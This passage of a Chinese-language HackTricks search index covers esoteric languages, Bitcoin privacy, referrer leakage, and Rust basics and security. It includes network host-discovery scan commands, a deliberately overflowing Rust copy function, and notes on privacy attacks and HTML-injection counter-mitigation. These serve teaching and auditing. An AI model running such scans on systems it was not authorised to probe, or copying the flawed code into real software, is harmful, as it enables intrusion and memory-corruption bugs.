HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Stego Tricks » 参考文献","id":"10180","title":"参考文献"},"10181":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Esoteric languages » Esoteric languages","id":"10181","title":"Esoteric languages"},"10182":{"body":"查看该维基以搜索更多晦涩语言","breadcrumbs":"Esoteric languages » Esolangs Wiki","id":"10182","title":"Esolangs Wiki"},"10183":{"body":"(\'&%:9]!~}|z2Vxwv-,POqponl$Hjig%eB@@>}= http://malbolge.doleczek.pl/","breadcrumbs":"Esoteric languages » Malbolge","id":"10183","title":"Malbolge"},"10184":{"body":"https://www.bertnase.de/npiet/npiet-execute.php","breadcrumbs":"Esoteric languages » npiet","id":"10184","title":"npiet"},"10185":{"body":"Midnight takes your heart and your soul\\nWhile your heart is as high as your soul\\nPut your heart without your soul into your heart Give back your heart Desire is a lovestruck ladykiller\\nMy world is nothing\\nFire is ice\\nHate is water\\nUntil my world is Desire,\\nBuild my world up\\nIf Midnight taking my world, Fire is nothing and Midnight taking my world, Hate is nothing\\nShout \\"FizzBuzz!\\"\\nTake it to the top If Midnight taking my world, Fire is nothing\\nShout \\"Fizz!\\"\\nTake it to the top If Midnight taking my world, Hate is nothing\\nSay \\"Buzz!\\"\\nTake it to the top Whisper my world https://codewithrockstar.com/","breadcrumbs":"Esoteric languages » Rockstar","id":"10185","title":"Rockstar"},"10186":{"body":"KoKoKoKoKoKoKoKoKoKo Kud-Kudah\\nKoKoKoKoKoKoKoKo kudah kO kud-Kudah Kukarek kudah\\nKoKoKo Kud-Kudah\\nkOkOkOkO kudah kO kud-Kudah Ko Kukarek kudah\\nKoKoKoKo Kud-Kudah KoKoKoKo kudah kO kud-Kudah kO Kukarek\\nkOkOkOkOkO Kukarek Kukarek kOkOkOkOkOkOkO\\nKukarek tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Esoteric languages » PETOOH","id":"10186","title":"PETOOH"},"10187":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 智能合约 被定义为在区块链上执行的程序,当满足特定条件时,自动化协议执行,无需中介。 去中心化应用(dApps) 基于智能合约构建,具有用户友好的前端和透明、可审计的后端。 代币与币 区分开来,币作为数字货币,而代币在特定上下文中代表价值或所有权。 实用代币 授予对服务的访问权限, 安全代币 表示资产所有权。 DeFi 代表去中心化金融,提供无中央权威的金融服务。 DEX 和 DAO 分别指去中心化交易平台和去中心化自治组织。","breadcrumbs":"Blockchain & Crypto Currencies » 基本概念","id":"10187","title":"基本概念"},"10188":{"body":"共识机制确保区块链上安全和一致的交易验证: 工作量证明(PoW) 依赖计算能力进行交易验证。 权益证明(PoS) 要求验证者持有一定数量的代币,相较于PoW减少能耗。","breadcrumbs":"Blockchain & Crypto Currencies » 共识机制","id":"10188","title":"共识机制"},"10189":{"body":"","breadcrumbs":"Blockchain & Crypto Currencies » 比特币基础知识","id":"10189","title":"比特币基础知识"},"1019":{"body":"为了保护隐私,使用新地址进行每笔交易至关重要。重用地址可能会通过将交易链接到同一实体而危及隐私。现代钱包通过其设计来阻止地址重用。","breadcrumbs":"Blockchain & Crypto » 防止地址重用","id":"1019","title":"防止地址重用"},"10190":{"body":"比特币交易涉及在地址之间转移资金。交易通过数字签名进行验证,确保只有私钥的拥有者可以发起转账。 关键组件: 多重签名交易 需要多个签名来授权交易。 交易由 输入 (资金来源)、 输出 (目的地)、 费用 (支付给矿工)和 脚本 (交易规则)组成。","breadcrumbs":"Blockchain & Crypto Currencies » 交易","id":"10190","title":"交易"},"10191":{"body":"旨在通过允许在一个通道内进行多笔交易来增强比特币的可扩展性,仅将最终状态广播到区块链。","breadcrumbs":"Blockchain & Crypto Currencies » 闪电网络","id":"10191","title":"闪电网络"},"10192":{"body":"隐私攻击,如 共同输入所有权 和 UTXO找零地址检测 ,利用交易模式。策略如 混合器 和 CoinJoin 通过模糊用户之间的交易链接来提高匿名性。","breadcrumbs":"Blockchain & Crypto Currencies » 比特币隐私问题","id":"10192","title":"比特币隐私问题"},"10193":{"body":"方法包括现金交易、挖矿和使用混合器。 CoinJoin 混合多笔交易以复杂化可追溯性,而 PayJoin 将CoinJoins伪装成常规交易以增强隐私。","breadcrumbs":"Blockchain & Crypto Currencies » 匿名获取比特币","id":"10193","title":"匿名获取比特币"},"10194":{"body":"","breadcrumbs":"Blockchain & Crypto Currencies » 比特币隐私攻击","id":"10194","title":"比特币隐私攻击"},"10195":{"body":"在比特币的世界中,交易的隐私和用户的匿名性常常是关注的主题。以下是攻击者可能通过几种常见方法破坏比特币隐私的简化概述。","breadcrumbs":"Blockchain & Crypto Currencies » 比特币隐私攻击总结","id":"10195","title":"比特币隐私攻击总结"},"10196":{"body":"由于涉及的复杂性,不同用户的输入在单笔交易中组合的情况通常很少。因此, 同一交易中的两个输入地址通常被假定属于同一所有者 。","breadcrumbs":"Blockchain & Crypto Currencies » 共同输入所有权假设","id":"10196","title":"共同输入所有权假设"},"10197":{"body":"UTXO,或 未花费交易输出 ,必须在交易中完全花费。如果只有一部分发送到另一个地址,剩余部分将转到一个新的找零地址。观察者可以假设这个新地址属于发送者,从而损害隐私。","breadcrumbs":"Blockchain & Crypto Currencies » UTXO找零地址检测","id":"10197","title":"UTXO找零地址检测"},"10198":{"body":"为减轻此问题,混合服务或使用多个地址可以帮助模糊所有权。","breadcrumbs":"Blockchain & Crypto Currencies » 示例","id":"10198","title":"示例"},"10199":{"body":"用户有时在网上分享他们的比特币地址,使得 很容易将地址与其所有者关联 。","breadcrumbs":"Blockchain & Crypto Currencies » 社交网络与论坛曝光","id":"10199","title":"社交网络与论坛曝光"},"102":{"body":"请注意, Discovering hosts from the outside ( ICMP ) 中提到的技术也可以在这里 应用 。 但是,既然你与其他主机处于 同一网络 ,你可以做 更多事情 : If you ping a subnet broadcast address the ping should be arrive to each host and they could respond to you : ping -b 10.10.5.255 Pinging the network broadcast address you could even find hosts inside other subnets : ping -b 255.255.255.255 Use the -PE, -PP, -PM flags of nmapto perform host discovery sending respectively ICMPv4 echo , timestamp , and subnet mask requests: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24","breadcrumbs":"Pentesting Network » Active ICMP","id":"102","title":"Active ICMP"},"1020":{"body":"多笔交易 :将支付拆分为几笔交易可以模糊交易金额,从而阻止隐私攻击。 避免找零 :选择不需要找零输出的交易可以通过破坏找零检测方法来增强隐私。 多个找零输出 :如果无法避免找零,生成多个找零输出仍然可以改善隐私。","breadcrumbs":"Blockchain & Crypto » 交易隐私策略","id":"1020","title":"交易隐私策略"},"10200":{"body":"交易可以被可视化为图形,揭示基于资金流动的用户之间的潜在连接。","breadcrumbs":"Blockchain & Crypto Currencies » 交易图分析","id":"10200","title":"交易图分析"},"10201":{"body":"该启发式基于分析具有多个输入和输出的交易,以猜测哪个输出是返回给发送者的找零。","breadcrumbs":"Blockchain & Crypto Currencies » 不必要输入启发式(最佳找零启发式)","id":"10201","title":"不必要输入启发式(最佳找零启发式)"},"10202":{"body":"bash 2 btc --> 4 btc\\n3 btc 1 btc 如果添加更多输入使得变化输出大于任何单一输入,它可能会混淆启发式分析。","breadcrumbs":"Blockchain & Crypto Currencies » 示例","id":"10202","title":"示例"},"10203":{"body":"攻击者可能会向之前使用过的地址发送少量资金,希望收款人将这些资金与未来交易中的其他输入合并,从而将地址链接在一起。","breadcrumbs":"Blockchain & Crypto Currencies » 强制地址重用","id":"10203","title":"强制地址重用"},"10204":{"body":"钱包应避免使用在已经使用过的空地址上收到的硬币,以防止这种隐私泄露。","breadcrumbs":"Blockchain & Crypto Currencies » 正确的钱包行为","id":"10204","title":"正确的钱包行为"},"10205":{"body":"确切支付金额: 没有找零的交易很可能是在两个由同一用户拥有的地址之间进行的。 整数金额: 交易中的整数金额表明这是一次支付,而非整数输出很可能是找零。 钱包指纹识别: 不同的钱包具有独特的交易创建模式,允许分析师识别所使用的软件,并可能识别找零地址。 金额与时间相关性: 公开交易时间或金额可能使交易可追踪。","breadcrumbs":"Blockchain & Crypto Currencies » 其他区块链分析技术","id":"10205","title":"其他区块链分析技术"},"10206":{"body":"通过监控网络流量,攻击者可以潜在地将交易或区块与IP地址关联,从而危及用户隐私。如果一个实体运营多个比特币节点,这种情况尤其明显,增强了他们监控交易的能力。","breadcrumbs":"Blockchain & Crypto Currencies » 流量分析","id":"10206","title":"流量分析"},"10207":{"body":"有关隐私攻击和防御的全面列表,请访问 Bitcoin Privacy on Bitcoin Wiki 。","breadcrumbs":"Blockchain & Crypto Currencies » 更多","id":"10207","title":"更多"},"10208":{"body":"","breadcrumbs":"Blockchain & Crypto Currencies » 匿名比特币交易","id":"10208","title":"匿名比特币交易"},"10209":{"body":"现金交易: 通过现金获取比特币。 现金替代品: 购买礼品卡并在线兑换比特币。 挖矿: 通过挖矿获得比特币是最私密的方法,尤其是单独进行时,因为挖矿池可能知道矿工的IP地址。 Mining Pools Information 盗窃: 理论上,盗窃比特币可能是另一种匿名获取比特币的方法,尽管这是非法的且不推荐。","breadcrumbs":"Blockchain & Crypto Currencies » 匿名获取比特币的方法","id":"10209","title":"匿名获取比特币的方法"},"1021":{"body":"门罗币满足数字交易中对绝对匿名性的需求,为隐私设定了高标准。","breadcrumbs":"Blockchain & Crypto » 门罗币:匿名性的灯塔","id":"1021","title":"门罗币:匿名性的灯塔"},"10210":{"body":"通过使用混合服务,用户可以 发送比特币 并 收到不同的比特币作为回报 ,这使得追踪原始所有者变得困难。然而,这需要对服务的信任,以确保其不保留日志并实际返回比特币。替代的混合选项包括比特币赌场。","breadcrumbs":"Blockchain & Crypto Currencies » 混合服务","id":"10210","title":"混合服务"},"10211":{"body":"CoinJoin 将来自不同用户的多个交易合并为一个,复杂化了任何试图将输入与输出匹配的过程。尽管其有效性,具有独特输入和输出大小的交易仍然可能被追踪。 可能使用 CoinJoin 的示例交易包括 402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a 和 85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238。 有关更多信息,请访问 CoinJoin 。有关以太坊上的类似服务,请查看 Tornado Cash ,它通过矿工的资金匿名化交易。","breadcrumbs":"Blockchain & Crypto Currencies » CoinJoin","id":"10211","title":"CoinJoin"},"10212":{"body":"PayJoin (或 P2EP)是 CoinJoin 的一种变体,它将两个参与方(例如,客户和商家)之间的交易伪装成常规交易,而没有 CoinJoin 特有的相等输出特征。这使得检测变得极其困难,并可能使交易监控实体使用的共同输入所有权启发式失效。 plaintext 2 btc --> 3 btc\\n5 btc 4 btc 像上述交易可以是 PayJoin,增强隐私,同时与标准比特币交易无区别。 PayJoin 的使用可能会显著破坏传统监控方法 ,使其成为追求交易隐私的一个有前景的发展。","breadcrumbs":"Blockchain & Crypto Currencies » PayJoin","id":"10212","title":"PayJoin"},"10213":{"body":"","breadcrumbs":"Blockchain & Crypto Currencies » 加密货币隐私的最佳实践","id":"10213","title":"加密货币隐私的最佳实践"},"10214":{"body":"为了维护隐私和安全,与区块链同步钱包至关重要。有两种方法脱颖而出: 全节点 :通过下载整个区块链,全节点确保最大隐私。所有曾经进行的交易都存储在本地,使对手无法识别用户感兴趣的交易或地址。 客户端区块过滤 :此方法涉及为区块链中的每个区块创建过滤器,使钱包能够识别相关交易,而不向网络观察者暴露特定兴趣。轻量级钱包下载这些过滤器,仅在与用户地址匹配时获取完整区块。","breadcrumbs":"Blockchain & Crypto Currencies » 钱包同步技术","id":"10214","title":"钱包同步技术"},"10215":{"body":"鉴于比特币在点对点网络上运行,建议使用 Tor 来掩盖您的 IP 地址,在与网络互动时增强隐私。","breadcrumbs":"Blockchain & Crypto Currencies » 利用 Tor 实现匿名性","id":"10215","title":"利用 Tor 实现匿名性"},"10216":{"body":"为了保护隐私,使用新地址进行每笔交易至关重要。重用地址可能会通过将交易链接到同一实体而危及隐私。现代钱包通过其设计来阻止地址重用。","breadcrumbs":"Blockchain & Crypto Currencies » 防止地址重用","id":"10216","title":"防止地址重用"},"10217":{"body":"多笔交易 :将支付拆分为几笔交易可以模糊交易金额,阻碍隐私攻击。 避免找零 :选择不需要找零输出的交易可以通过干扰找零检测方法来增强隐私。 多个找零输出 :如果无法避免找零,生成多个找零输出仍然可以改善隐私。","breadcrumbs":"Blockchain & Crypto Currencies » 交易隐私策略","id":"10217","title":"交易隐私策略"},"10218":{"body":"门罗币满足数字交易中对绝对匿名性的需求,为隐私设定了高标准。","breadcrumbs":"Blockchain & Crypto Currencies » 门罗币:匿名性的灯塔","id":"10218","title":"门罗币:匿名性的灯塔"},"10219":{"body":"","breadcrumbs":"Blockchain & Crypto Currencies » 以太坊:燃料费和交易","id":"10219","title":"以太坊:燃料费和交易"},"1022":{"body":"","breadcrumbs":"Blockchain & Crypto » 以太坊:燃料费和交易","id":"1022","title":"以太坊:燃料费和交易"},"10220":{"body":"燃料费衡量在以太坊上执行操作所需的计算努力,以 gwei 定价。例如,一笔交易的费用为 2,310,000 gwei(或 0.00231 ETH),涉及燃料限制和基本费用,并向矿工提供小费以激励他们。用户可以设置最高费用,以确保他们不会支付过多,超出部分会退还。","breadcrumbs":"Blockchain & Crypto Currencies » 理解燃料费","id":"10220","title":"理解燃料费"},"10221":{"body":"以太坊中的交易涉及发送者和接收者,可以是用户或智能合约地址。它们需要支付费用并且必须被挖掘。交易中的关键信息包括接收者、发送者的签名、金额、可选数据、燃料限制和费用。值得注意的是,发送者的地址是从签名中推导出来的,因此在交易数据中不需要它。 这些实践和机制是任何希望参与加密货币,同时优先考虑隐私和安全的人的基础。","breadcrumbs":"Blockchain & Crypto Currencies » 执行交易","id":"10221","title":"执行交易"},"10222":{"body":"https://en.wikipedia.org/wiki/Proof_of_stake https://www.mycryptopedia.com/public-key-private-key-explained/ https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions https://ethereum.org/en/developers/docs/transactions/ https://ethereum.org/en/developers/docs/gas/ https://en.bitcoin.it/wiki/Privacy tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Blockchain & Crypto Currencies » 参考文献","id":"10222","title":"参考文献"},"10223":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 Referrer 是浏览器用来指示上一个访问页面的头部。","breadcrumbs":"Interesting Http » 引荐头和策略","id":"10223","title":"引荐头和策略"},"10224":{"body":"如果在某个网页中,任何敏感信息位于 GET 请求参数中,如果该页面包含指向外部源的链接,或者攻击者能够使/建议(社会工程学)用户访问一个由攻击者控制的 URL。它可能能够在最新的 GET 请求中提取敏感信息。","breadcrumbs":"Interesting Http » 敏感信息泄露","id":"10224","title":"敏感信息泄露"},"10225":{"body":"您可以让浏览器遵循一个 Referrer-policy ,以 避免 将敏感信息发送到其他网络应用程序: Referrer-Policy: no-referrer\\nReferrer-Policy: no-referrer-when-downgrade\\nReferrer-Policy: origin\\nReferrer-Policy: origin-when-cross-origin\\nReferrer-Policy: same-origin\\nReferrer-Policy: strict-origin\\nReferrer-Policy: strict-origin-when-cross-origin\\nReferrer-Policy: unsafe-url","breadcrumbs":"Interesting Http » 缓解措施","id":"10225","title":"缓解措施"},"10226":{"body":"您可以使用 HTML meta 标签覆盖此规则(攻击者需要利用 HTML 注入): html \\n","breadcrumbs":"Interesting Http » Counter-Mitigation","id":"10226","title":"Counter-Mitigation"},"10227":{"body":"永远不要将任何敏感数据放入URL中的GET参数或路径中。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Interesting Http » 防御","id":"10227","title":"防御"},"10228":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Rust Basics » Rust Basics","id":"10228","title":"Rust Basics"},"10229":{"body":"创建一个结构体,其中一个值可以是任何类型 rust struct Wrapper {\\nvalue: T,\\n} impl Wrapper {\\npub fn new(value: T) -> Self {\\nWrapper { value }\\n}\\n} Wrapper::new(42).value\\nWrapper::new(\\"Foo\\").value, \\"Foo\\"","breadcrumbs":"Rust Basics » 泛型","id":"10229","title":"泛型"},"1023":{"body":"燃料费衡量在以太坊上执行操作所需的计算工作量,以 gwei 计价。例如,一笔交易的费用为 2,310,000 gwei(或 0.00231 ETH),涉及燃料限制和基本费用,并向矿工提供小费以激励他们。用户可以设置最高费用,以确保他们不会支付过多,超出部分会被退还。","breadcrumbs":"Blockchain & Crypto » 理解燃料费","id":"1023","title":"理解燃料费"},"10230":{"body":"Option类型意味着值可能是Some类型(有某些东西)或None: rust pub enum Option {\\nNone,\\nSome(T),\\n} 您可以使用 is_some() 或 is_none() 等函数来检查 Option 的值。","breadcrumbs":"Rust Basics » Option, Some & None","id":"10230","title":"Option, Some & None"},"10231":{"body":"宏比函数更强大,因为它们扩展以生成比您手动编写的代码更多的代码。例如,函数签名必须声明函数的参数数量和类型。另一方面,宏可以接受可变数量的参数:我们可以用一个参数调用 println!(\\"hello\\"),或者用两个参数调用 println!(\\"hello {}\\", name)。此外,宏在编译器解释代码含义之前被扩展,因此宏可以在给定类型上实现一个特征。例如,函数不能这样做,因为它在运行时被调用,而特征需要在编译时实现。 rust macro_rules! my_macro {\\n() => {\\nprintln!(\\"Check out my macro!\\");\\n};\\n($val:expr) => {\\nprintln!(\\"Look at this other macro: {}\\", $val);\\n}\\n}\\nfn main() {\\nmy_macro!();\\nmy_macro!(7777);\\n} // Export a macro from a module\\nmod macros {\\n#[macro_export]\\nmacro_rules! my_macro {\\n() => {\\nprintln!(\\"Check out my macro!\\");\\n};\\n}\\n}","breadcrumbs":"Rust Basics » 宏","id":"10231","title":"宏"},"10232":{"body":"rust // Iterate through a vector\\nlet my_fav_fruits = vec![\\"banana\\", \\"raspberry\\"];\\nlet mut my_iterable_fav_fruits = my_fav_fruits.iter();\\nassert_eq!(my_iterable_fav_fruits.next(), Some(&\\"banana\\"));\\nassert_eq!(my_iterable_fav_fruits.next(), Some(&\\"raspberry\\"));\\nassert_eq!(my_iterable_fav_fruits.next(), None); // When it\'s over, it\'s none // One line iteration with action\\nmy_fav_fruits.iter().map(|x| capitalize_first(x)).collect() // Hashmap iteration\\nfor (key, hashvalue) in &*map {\\nfor key in map.keys() {\\nfor value in map.values() {","breadcrumbs":"Rust Basics » 迭代","id":"10232","title":"迭代"},"10233":{"body":"rust enum List {\\nCons(i32, List),\\nNil,\\n} let list = Cons(1, Cons(2, Cons(3, Nil)));","breadcrumbs":"Rust Basics » 递归盒子","id":"10233","title":"递归盒子"},"10234":{"body":"if rust let n = 5;\\nif n < 0 {\\nprint!(\\"{} is negative\\", n);\\n} else if n > 0 {\\nprint!(\\"{} is positive\\", n);\\n} else {\\nprint!(\\"{} is zero\\", n);\\n} 匹配 rust match number {\\n// Match a single value\\n1 => println!(\\"One!\\"),\\n// Match several values\\n2 | 3 | 5 | 7 | 11 => println!(\\"This is a prime\\"),\\n// TODO ^ Try adding 13 to the list of prime values\\n// Match an inclusive range\\n13..=19 => println!(\\"A teen\\"),\\n// Handle the rest of cases\\n_ => println!(\\"Ain\'t special\\"),\\n} let boolean = true;\\n// Match is an expression too\\nlet binary = match boolean {\\n// The arms of a match must cover all the possible values\\nfalse => 0,\\ntrue => 1,\\n// TODO ^ Try commenting out one of these arms\\n}; 循环(无限) rust loop {\\ncount += 1;\\nif count == 3 {\\nprintln!(\\"three\\");\\ncontinue;\\n}\\nprintln!(\\"{}\\", count);\\nif count == 5 {\\nprintln!(\\"OK, that\'s enough\\");\\nbreak;\\n}\\n} 当 rust let mut n = 1;\\nwhile n < 101 {\\nif n % 15 == 0 {\\nprintln!(\\"fizzbuzz\\");\\n} else if n % 5 == 0 {\\nprintln!(\\"buzz\\");\\n} else {\\nprintln!(\\"{}\\", n);\\n}\\nn += 1;\\n} for rust for n in 1..101 {\\nif n % 15 == 0 {\\nprintln!(\\"fizzbuzz\\");\\n} else {\\nprintln!(\\"{}\\", n);\\n}\\n} // Use \\"..=\\" to make inclusive both ends\\nfor n in 1..=100 {\\nif n % 15 == 0 {\\nprintln!(\\"fizzbuzz\\");\\n} else if n % 3 == 0 {\\nprintln!(\\"fizz\\");\\n} else if n % 5 == 0 {\\nprintln!(\\"buzz\\");\\n} else {\\nprintln!(\\"{}\\", n);\\n}\\n} // ITERATIONS let names = vec![\\"Bob\\", \\"Frank\\", \\"Ferris\\"];\\n//iter - Doesn\'t consume the collection\\nfor name in names.iter() {\\nmatch name {\\n&\\"Ferris\\" => println!(\\"There is a rustacean among us!\\"),\\n_ => println!(\\"Hello {}\\", name),\\n}\\n}\\n//into_iter - COnsumes the collection\\nfor name in names.into_iter() {\\nmatch name {\\n\\"Ferris\\" => println!(\\"There is a rustacean among us!\\"),\\n_ => println!(\\"Hello {}\\", name),\\n}\\n}\\n//iter_mut - This mutably borrows each element of the collection\\nfor name in names.iter_mut() {\\n*name = match name {\\n&mut \\"Ferris\\" => \\"There is a rustacean among us!\\",\\n_ => \\"Hello\\",\\n}\\n} if let rust let optional_word = Some(String::from(\\"rustlings\\"));\\nif let word = optional_word {\\nprintln!(\\"The word is: {}\\", word);\\n} else {\\nprintln!(\\"The optional word doesn\'t contain anything\\");\\n} while let rust let mut optional = Some(0);\\n// This reads: \\"while `let` destructures `optional` into\\n// `Some(i)`, evaluate the block (`{}`). Else `break`.\\nwhile let Some(i) = optional {\\nif i > 9 {\\nprintln!(\\"Greater than 9, quit!\\");\\noptional = None;\\n} else {\\nprintln!(\\"`i` is `{:?}`. Try again.\\", i);\\noptional = Some(i + 1);\\n}\\n// ^ Less rightward drift and doesn\'t require\\n// explicitly handling the failing case.\\n}","breadcrumbs":"Rust Basics » 条件语句","id":"10234","title":"条件语句"},"10235":{"body":"为一个类型创建一个新方法 rust trait AppendBar {\\nfn append_bar(self) -> Self;\\n} impl AppendBar for String {\\nfn append_bar(self) -> Self{\\nformat!(\\"{}Bar\\", self)\\n}\\n} let s = String::from(\\"Foo\\");\\nlet s = s.append_bar();\\nprintln!(\\"s: {}\\", s);","breadcrumbs":"Rust Basics » 特性","id":"10235","title":"特性"},"10236":{"body":"rust #[cfg(test)]\\nmod tests {\\n#[test]\\nfn you_can_assert() {\\nassert!(true);\\nassert_eq!(true, true);\\nassert_ne!(true, false);\\n}\\n}","breadcrumbs":"Rust Basics » 测试","id":"10236","title":"测试"},"10237":{"body":"Arc Arc可以使用Clone来创建对对象的更多引用,以将它们传递给线程。当指向一个值的最后一个引用指针超出作用域时,该变量会被丢弃。 rust use std::sync::Arc;\\nlet apple = Arc::new(\\"the same apple\\");\\nfor _ in 0..10 {\\nlet apple = Arc::clone(&apple);\\nthread::spawn(move || {\\nprintln!(\\"{:?}\\", apple);\\n});\\n} Threads 在这种情况下,我们将传递一个变量给线程,它将能够修改该变量。 rust fn main() {\\nlet status = Arc::new(Mutex::new(JobStatus { jobs_completed: 0 }));\\nlet status_shared = Arc::clone(&status);\\nthread::spawn(move || {\\nfor _ in 0..10 {\\nthread::sleep(Duration::from_millis(250));\\nlet mut status = status_shared.lock().unwrap();\\nstatus.jobs_completed += 1;\\n}\\n});\\nwhile status.lock().unwrap().jobs_completed < 10 {\\nprintln!(\\"waiting... \\");\\nthread::sleep(Duration::from_millis(500));\\n}\\n}","breadcrumbs":"Rust Basics » 线程","id":"10237","title":"线程"},"10238":{"body":"Rust 默认提供强大的内存安全保证,但您仍然可以通过 unsafe 代码、依赖问题或逻辑错误引入关键漏洞。以下迷你备忘单汇集了您在对 Rust 软件进行攻防安全审查时最常接触的原语。 不安全代码与内存安全 unsafe 块选择退出编译器的别名和边界检查,因此 所有传统的内存损坏漏洞(越界、使用后释放、双重释放等)可能会再次出现 。快速审计检查清单: 查找 unsafe 块、extern \\"C\\" 函数、对 ptr::copy* 的调用、std::mem::transmute、MaybeUninit、原始指针或 ffi 模块。 验证传递给低级函数的每个指针算术和长度参数。 优先使用 #![forbid(unsafe_code)](整个 crate)或 #[deny(unsafe_op_in_unsafe_fn)](1.68 +),以在有人重新引入 unsafe 时使编译失败。 使用原始指针创建的溢出示例: rust use std::ptr; fn vuln_copy(src: &[u8]) -> Vec {\\nlet mut dst = Vec::with_capacity(4);\\nunsafe {\\n// ❌ copies *src.len()* bytes, the destination only reserves 4.\\nptr::copy_nonoverlapping(src.as_ptr(), dst.as_mut_ptr(), src.len());\\ndst.set_len(src.len());\\n}\\ndst\\n} 运行 Miri 是在测试时检测 UB 的一种廉价方法: bash rustup component add miri\\ncargo miri test # hunts for OOB / UAF during unit tests 使用 RustSec / cargo-audit 审计依赖项 大多数实际的 Rust 漏洞存在于第三方 crate 中。可以在本地查询 RustSec 顾问数据库(社区驱动): bash cargo install cargo-audit\\ncargo audit # flags vulnerable versions listed in Cargo.lock 将其集成到 CI 中,并在 --deny warnings 时失败。 cargo deny check advisories 提供类似的功能,以及许可证和禁用列表检查。 使用 cargo-vet 进行供应链验证 (2024) cargo vet 为您导入的每个 crate 记录一个审查哈希,并防止未注意的升级: bash cargo install cargo-vet\\ncargo vet init # generates vet.toml\\ncargo vet --locked # verifies packages referenced in Cargo.lock 该工具正在被Rust项目基础设施和越来越多的组织采用,以减轻被污染包攻击的风险。 Fuzzing your API surface (cargo-fuzz) 模糊测试可以轻松捕捉到可能导致DoS或旁路问题的恐慌、整数溢出和逻辑错误: bash cargo install cargo-fuzz\\ncargo fuzz init # creates fuzz_targets/\\ncargo fuzz run fuzz_target_1 # builds with libFuzzer & runs continuously 将模糊目标添加到您的仓库并在您的管道中运行它。","breadcrumbs":"Rust Basics » 安全基础","id":"10238","title":"安全基础"},"10239":{"body":"RustSec Advisory Database – https://rustsec.org Cargo-vet: \\"审计您的 Rust 依赖项\\" – https://mozilla.github.io/cargo-vet/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Rust Basics » 